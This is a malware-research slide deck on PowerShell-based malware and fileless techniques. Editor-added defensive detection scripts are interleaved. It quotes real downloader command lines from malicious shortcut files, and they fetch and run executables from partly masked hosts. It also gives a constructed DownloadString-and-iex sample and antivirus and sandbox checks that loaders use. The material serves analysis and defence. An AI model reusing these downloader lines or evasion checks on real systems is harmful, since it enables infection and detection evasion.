PowerMalware ?!
2016.11.18 – public edition
AhnLab Security Emergency response Center (ASEC), Analysis Team
CHA Minseok (차민석, 車珉錫, Jacky Cha, mstoned7), Senior Researcher
Malware and techniques that use PowerShell
© AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
− CHA Minseok (차민석, 車珉錫, Jacky Cha, mstoned7)
− 7 January 1988: started computing on an Apple ][+ clone
− 1989: infected by a Brain virus variant
− 1997: joined AhnLab
− Senior Researcher at AhnLab (Senior Malware Researcher)
− Malware analysis and research in the ASEC Analysis Team
− Member of the public-private joint investigation team and the cyber-security expert group
− Member of vforum, AVED and AMTSO
− WildList reporter
:~$whoami
• Books
- 보안에 미쳐라 (Be Crazy About Security, 2016)
* Source: http://www.yes24.com/24/goods/29333992
Before we begin
• There is no perfectly secure system in this world
- WarGames (1983), starring Matthew Broderick
* Source: WarGames (1983)
Wrap up
• Malware that uses PowerShell is increasing
- It tracks the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- First uses in targeted attacks have been observed
• Use of WMI
- Makes fileless malware possible
• Outlook
- PowerShell malware is expected to grow alongside JS and VBS malware
- Potential for multi-platform malware
Contents
01 PowerShell
02 Malware using PowerShell
03 Technique
04 File types
05 Fileless Technique
06 Case Study
07 Conclusion
01
PowerShell
PowerShell
• PowerShell
- Scripting language released in 2006
- Shipped as a separate download for Windows XP and Vista; installed by default from Windows 7 onward
* Source: https://msdn.microsoft.com/en-us/powershell
Windows Management Instrumentation (WMI)
• WMI
- (figure on the original slide)
* Source: https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
Windows Management Instrumentation (WMI)
• WMI architecture
- (figure on the original slide)
* Source: http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
PowerShell + WMI
• Getting information about the installed antivirus product
- Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
PowerShell + WMI
• Virtual-environment check
- Get-WmiObject -Class Win32_ComputerSystem
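The two WMI queries on these slides are exactly what a downloader runs before deciding whether to fetch its payload: is a scanner active, and is this a sandbox? The script below is an added example written for this page, not code from the deck or from AhnLab. It wraps both queries so the raw output becomes a decision. The productState decoding is the widely used but undocumented reading of that packed field, and the list of hypervisor strings is the editor's assumption; both are heuristics, and a sandbox can spoof the SMBIOS fields WMI reports.

```powershell
# Added example (not from the original deck). Windows only; Windows PowerShell 5.1.
# On PowerShell 7 replace Get-WmiObject with Get-CimInstance (same -Namespace/-Class parameters).

function Get-AvStatus {
    # root\SecurityCenter2 exists on client SKUs (Vista and later). Server SKUs have no
    # Security Center, so the query throws there; that case is reported as "nothing found".
    try {
        $products = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ErrorAction Stop
    } catch {
        return @()
    }
    foreach ($p in $products) {
        # productState is a packed integer. Common (undocumented) reading of its hex form 0xAABBCC:
        #   BB = 0x10 or 0x11 -> real-time protection enabled, anything else -> disabled
        #   CC = 0x00         -> definitions current, 0x10 -> out of date
        # Assumption carried over from field practice, not from the vendor documentation.
        $hex = '{0:X6}' -f [int]$p.productState
        [pscustomobject]@{
            Name     = $p.displayName
            Enabled  = ($hex.Substring(2, 2) -in @('10', '11'))
            UpToDate = ($hex.Substring(4, 2) -eq '00')
            RawState = $hex
        }
    }
}

function Test-VirtualMachine {
    $cs = Get-WmiObject -Class Win32_ComputerSystem
    # Strings hypervisors leave in the SMBIOS fields that Win32_ComputerSystem exposes.
    # Hyper-V reports Manufacturer "Microsoft Corporation" with Model "Virtual Machine",
    # so Model is checked as well as Manufacturer. List is the editor's assumption.
    $pattern = 'VMware|VirtualBox|innotek|QEMU|KVM|Xen|Parallels|Virtual Machine'
    [pscustomobject]@{
        Manufacturer = $cs.Manufacturer
        Model        = $cs.Model
        LooksVirtual = [bool](($cs.Manufacturer + ' ' + $cs.Model) -match $pattern)
    }
}

# A downloader would branch on these two results; here they are just reported.
Get-AvStatus | Format-Table -AutoSize
Test-VirtualMachine | Format-List
```

For a defender the useful point is the inverse: a script that queries root\SecurityCenter2 or Win32_ComputerSystem and then exits or sleeps is behaving like a loader, and both queries show up verbatim in PowerShell script-block logs (Event ID 4104) when that logging is turned on.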
02
Malware using PowerShell
Timeline (figure on the original slide; year axis 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016, 2017)
- Milestones shown: enhanced batch viruses; macro viruses; VBScript malware; Loveletter; Monad announced; PowerShell released; PowerShell malware PoC; PowerShell ransomware; Poweliks; Phase; Bedep; Kovter; PowerShell + macro appears; WMI-based fileless incidents; flood of PowerShell downloaders
1995 – Macro virus
• 1995–2001: the heyday of the macro virus
- (figure on the original slide)
2000 - Loveletter
• 4 May 2000: the LoveLetter virus
- Spread by e-mail
- Social engineering: a mail with the subject "ILOVEYOU"
- Destroyed image and music files
2004 – Monad
• Concern
- Monad (the PowerShell prototype) developed in 2004
* Source: https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
2006 - PowerShell malware PoC
• PowerShell proof-of-concept malware
- (figure on the original slide)
* Source: https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
2006 - PowerShell Released
• PowerShell released
- (figure on the original slide)
* Source: http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
2013 – PowerShell Ransomware
• PowerShell ransomware appears
- (figure on the original slide)
* Source: https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
2014 - Poweliks
• Poweliks
- Stored inside the registry
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
2014 - Phase
• Phase
- A variant of Solarbot, which was discovered in 2013
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
2015 – WMI abuse
• Black Hat 2015
- (figure on the original slide)
* Source: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
2015 - PowerShell malware begins to rise
• Rise of PowerShell malware
- (figure on the original slide)
* Source: https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
2016 - Macro + PowerShell
• Macro + PowerShell
- (figure on the original slide)
* Source: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
2016 - PowerShell-based malware becomes widespread
• PowerShell-based malware becomes widespread
- (figure on the original slide)
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03
Technical
Conditions for in-the-wild malware
- A large user base
- Gaps in the security posture
- Easy to produce
Advantages of PowerShell malware
- Powerful functionality
- Easy to produce
- Potential to bypass behaviour-based products
Main infection vectors
• Main infection vectors
Mail
− Attachment or link
Web browser
− Exploit kits
− Also used for fileless infections
Infection vector
• Mail
- (figure on the original slide)
Running PowerShell
• Execution permission
- Tested DownloadFile both as a single command and as a script
- The single command runs, but the script is blocked by the execution policy (the default Restricted policy governs only .ps1 script files; commands passed on the command line are not subject to it)
Running PowerShell
• Bypassing the PowerShell execution policy
- (figure on the original slide)
* Source: https://technet.microsoft.com/en-us/library/ee176847.aspx
Running PowerShell
• Bypassing the PowerShell execution policy
- (figure on the original slide)
* Source: http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
Functionality
• Downloader or dropper
- (figure on the original slide)
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04
File types
File types
- Office (DOC, DOCM, XLS, XLSM)
- Shortcut (LNK)
- PowerShell (PS1)
- Windows Script File (WSF), HTML Application (HTA)
- JavaScript / Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
JavaScript - JS
• JavaScript (JS)
- (figure on the original slide)
Visual Basic Script
• Visual Basic Script (VBS)
- (figure on the original slide)
Windows Script File (WSF)
• WSF (Windows Script File)
- Mostly JavaScript
Windows Script File (WSF)
• WSF (Windows Script File)
- (figure on the original slide)
HTML Application (HTA)
• HTML Application (HTA)
- Mostly JavaScript
Office (DOC, DOCM, XLS, XLSM)
• Documents containing macros
- (figure on the original slide)
Shortcut (LNK)
• LNK
- (figure on the original slide)
Shortcut (LNK)
• Download
- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
Shortcut (LNK)
• Download
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
Shortcut (LNK)
• Encoding
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
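The three LNK command lines above show the whole downloader pattern in one line each: execution-policy and window switches, a WebClient download, a launcher, and in the last case a base64 wrapper around all of it. The script below is an added example written for this page, not code from the deck or from AhnLab. It is the triage logic an analyst would run over powershell.exe command lines pulled from LNK targets, Sysmon Event ID 1 or Security Event ID 4688: it decodes -EncodedCommand (UTF-16LE base64), collapses the 'tes'+'t3.e'+'xe' string-splitting, extracts URLs and counts indicators. The switch and keyword lists are the editor's choices. The first two sample inputs are the deck's command lines with their backslashes restored and the domains masked as on the slides; the third is built inside the script so that its base64 is valid (the slide's is truncated); the fourth is a benign admin command for contrast.

```powershell
# Added example (not from the original deck). Pure string processing; runs on Windows
# PowerShell 5.1 or PowerShell 7 on any OS. Sample command lines below are constructed.

function ConvertFrom-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the payload is UTF-16LE, base64.
    if ($CommandLine -match '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try   { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # truncated or otherwise invalid base64 (common in logs)
    }
    return $null
}

function Expand-SplitStrings {
    param([string]$Text)
    # 'tes'+'t3.e'+'xe' -> 'test3.exe'. Each pass joins one adjacent pair, so loop to a fixed point.
    do {
        $before = $Text
        $Text = $Text -replace "'([^']*)'\s*\+\s*'([^']*)'", '''$1$2'''
    } while ($Text -ne $before)
    return $Text
}

function Get-PowerShellCommandIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = ConvertFrom-EncodedCommand $CommandLine
    # Analyse the wrapper and the decoded payload together so nothing hides behind the base64.
    $text = Expand-SplitStrings ($CommandLine + ' ' + $decoded)
    $flags = [ordered]@{
        ExecutionPolicyBypass = [bool]($text -match '(?i)-e(?:xecutionpolicy|p)\s+(bypass|unrestricted)')
        HiddenWindow          = [bool]($text -match '(?i)-w(?:indowstyle)?\s+hidden')
        NoProfile             = [bool]($text -match '(?i)-no(?:p|profile)\b')
        EncodedCommand        = ($null -ne $decoded)
        DownloadPrimitive     = [bool]($text -match '(?i)DownloadFile|DownloadString|WebClient|Invoke-WebRequest|Start-BitsTransfer')
        ExecutionPrimitive    = [bool]($text -match '(?i)Invoke-Expression|\biex\b|Start-Process|cmd(?:\.exe)?\s+/c')
    }
    $urls = [regex]::Matches($text, 'https?://[^\s''"),;]+') | ForEach-Object { $_.Value }
    [pscustomobject]@{
        Score      = @($flags.Values | Where-Object { $_ }).Count
        Flags      = ($flags.GetEnumerator() | Where-Object Value | ForEach-Object Key) -join ','
        Urls       = $urls -join ' '
        Decoded    = $decoded
        Normalized = $text.Trim()
    }
}

# --- constructed samples -------------------------------------------------------------
$lnk1 = @'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
'@
$lnk2 = @'
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
'@
# Encoded sample is generated here so the base64 is complete and decodable.
$payload = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')|iex"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$lnk3    = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand $b64"
$benign  = 'powershell.exe -NoProfile -Command Get-Service -Name WinRM'

$lnk1, $lnk2, $lnk3, $benign | ForEach-Object { Get-PowerShellCommandIndicators $_ } |
    Format-List Score, Flags, Urls, Decoded
```

With these inputs the first sample scores 5 (policy bypass, hidden window, no profile, download, cmd /c launcher), the string-split sample 2 (download plus Start-Process, visible only after the pieces are joined), the encoded sample 3 (encoded command plus DownloadString and iex found inside the decoded payload), and the benign command 1 (-NoProfile alone). A single switch is normal administration; a download primitive next to a launcher, with or without -EncodedCommand, is the downloader shape the slides describe and is worth an alert on its own.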
PowerShell (PS1)
• PowerShell
- (figure on the original slide)
05
Fileless Technique
Fileless
• Used as a fileless technique
- Poweliks
* Source: https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
Fileless
• Used as a fileless technique
- Poweliks (figure on the original slide)
Fileless malware
• Kovter
- The Run entry cannot be read
Fileless malware
• Kovter
- Runs its script through mshta.exe
Fileless malware
• Kovter
- Encoded data
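The three Kovter slides and the Poweliks slides before them describe one registry-resident pattern: a Run value whose name regedit cannot display, whose data starts a script host such as mshta.exe instead of an executable, and a second value holding an encoded blob that the script decodes. The hunt below is an added example written for this page, not code from the deck or from AhnLab. It walks the Run and RunOnce keys through the .NET registry API, so the raw value name is available for inspection as a string, and reports values that match any of those three traits. The key list, the script-host keyword list and the 200-character blob threshold are the editor's assumptions.

```powershell
# Added example (not from the original deck). Windows only; read-only registry access, so it
# runs without elevation for HKCU and for the HKLM keys that are world-readable.

function Test-UnprintableName {
    param([string]$Name)
    # An empty name, or a name containing C0 control characters (a leading NUL is the classic
    # trick), shows as blank or produces an error in regedit; treat both as suspicious.
    return ($Name.Length -eq 0) -or ($Name -match '[\x00-\x1F\x7F]')
}

function Get-SuspiciousRunValues {
    $roots = @(
        @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'Software\Microsoft\Windows\CurrentVersion\Run' }
        @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'Software\Microsoft\Windows\CurrentVersion\RunOnce' }
        @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Microsoft\Windows\CurrentVersion\Run' }
        @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Microsoft\Windows\CurrentVersion\RunOnce' }
        @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run' }
    )
    # Script hosts and protocol handlers that fileless families launch in place of an EXE path.
    $scriptHost = '(?i)mshta|javascript:|vbscript:|powershell|wscript|cscript|rundll32.*javascript|regsvr32.*scrobj'
    $opts = [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames

    foreach ($r in $roots) {
        $key = $r.Hive.OpenSubKey($r.Path)
        if ($null -eq $key) { continue }          # key absent (e.g. Wow6432Node on 32-bit Windows)
        foreach ($name in $key.GetValueNames()) {
            $data = [string]$key.GetValue($name, '', $opts)
            $reasons = @()
            if (Test-UnprintableName $name)          { $reasons += 'unreadable value name' }
            if ($data -match $scriptHost)            { $reasons += 'script host launcher' }
            if ($data -match '[A-Za-z0-9+/=]{200,}') { $reasons += 'long encoded blob' }
            if ($reasons.Count -eq 0) { continue }

            $preview = if ($data.Length -gt 120) { $data.Substring(0, 120) + '...' } else { $data }
            [pscustomobject]@{
                Key     = "$($r.Hive.Name)\$($r.Path)"
                Name    = ($name -replace '[\x00-\x1F\x7F]', '?')   # printable form for the report
                Reasons = $reasons -join '; '
                Data    = $preview
            }
        }
        $key.Close()
    }
}

Get-SuspiciousRunValues | Format-List
```

Any hit with "unreadable value name" deserves a look even when the data seems harmless, because a legitimate installer has no reason to create one. A hit on "script host launcher" should be followed by reading the referenced key or file in full: with Kovter the launcher only bootstraps, and the encoded data it decodes is where the actual behaviour is.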
06
Case Study
07
Conclusion
Error
• "Windows PowerShell has stopped working"
- A Windows PowerShell error can appear unexpectedly
Response
• WMI for Detection and Response
- (figure on the original slide)
* Source: https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
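The WMI persistence that the Black Hat 2015 slide refers to rests on three objects in root\subscription: an __EventFilter (the WQL trigger), an __EventConsumer (what runs) and a __FilterToConsumerBinding that joins them. Listing bindings alone is not enough, because the payload sits in the consumer and the trigger in the filter. The script below is an added example written for this page, not code from the deck, from AhnLab or from the ICS-CERT paper cited above. It resolves every binding to its filter query and consumer payload and flags payloads that reference a script host; the keyword list is the editor's choice.

```powershell
# Added example (not from the original deck). Windows only; run elevated so that all of
# root\subscription is readable. On PowerShell 7 use Get-CimInstance with the same parameters.

function Get-WmiSubscriptionBindings {
    $ns = 'root\subscription'
    $filters   = @{}
    $consumers = @{}
    # Index filters and consumers by their relative path, which is what a binding refers to.
    Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.__RELPATH]   = $_ }
    Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.__RELPATH] = $_ }

    foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
        # Filter/Consumer are object paths; strip a leading "\\server\namespace:" if present.
        $f = $filters[($b.Filter   -replace '^\\\\[^:]*:', '')]
        $c = $consumers[($b.Consumer -replace '^\\\\[^:]*:', '')]
        $class = if ($c) { $c.__CLASS } else { '(missing)' }
        # The payload lives in a different property for each consumer class.
        $payload = switch ($class) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFilename } }
            default                     { '' }
        }
        [pscustomobject]@{
            Binding    = $b.__RELPATH
            FilterName = $f.Name
            Query      = $f.Query
            Consumer   = $class
            Payload    = $payload
            Suspicious = [bool]($payload -match '(?i)powershell|mshta|cmd\.exe|wscript|cscript|-enc|DownloadString|Invoke-Expression')
        }
    }
}

Get-WmiSubscriptionBindings | Sort-Object Suspicious -Descending | Format-List
```

On a clean client the list is usually empty or contains only vendor entries (the SCM event log consumer, some management agents). A CommandLineEventConsumer whose template starts powershell.exe, or an ActiveScriptEventConsumer with inline ScriptText, paired with a filter that fires on boot or on a timer, is the persistent, fileless backdoor shape the referenced paper describes; remove the binding first, then the consumer and filter, so the trigger cannot fire mid-cleanup.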
Outlook
• Expansion of PowerShell
- PowerShell on Linux, now open source
* Source: https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
Outlook
- A replacement for JS and VBS?!
- Obfuscation
- Cross-platform
Wrap up
• Malware that uses PowerShell is increasing
- It tracks the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- First uses in targeted attacks have been observed
• Use of WMI
- Makes fileless malware possible
• Outlook
- PowerShell malware is expected to grow alongside JS and VBS malware
- Potential for multi-platform malware
Today's security problem
• Not really a fair fight
* Source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
Today's security problem
• Security is something everyone has to do together
* Source: http://www.security-marathon.be/?p=1786
Q&A
email: minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
References
• Ryan Kazanciyan & Matt Hastings, 'Investigating PowerShell Attacks', 2014
• Matt Graeber, 'Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor', 2015
• Santiago M. Pontiroli & F. Roberto Martinez, 'The Tao of .NET and PowerShell Malware Analysis', 2015
• Kim Seunghoon / AhnLab, 'Analysis of macro downloaders', 2016
PowerShell malware trends, 2016-11-18, CHA Minseok, Digital Forensics technical lecture, public edition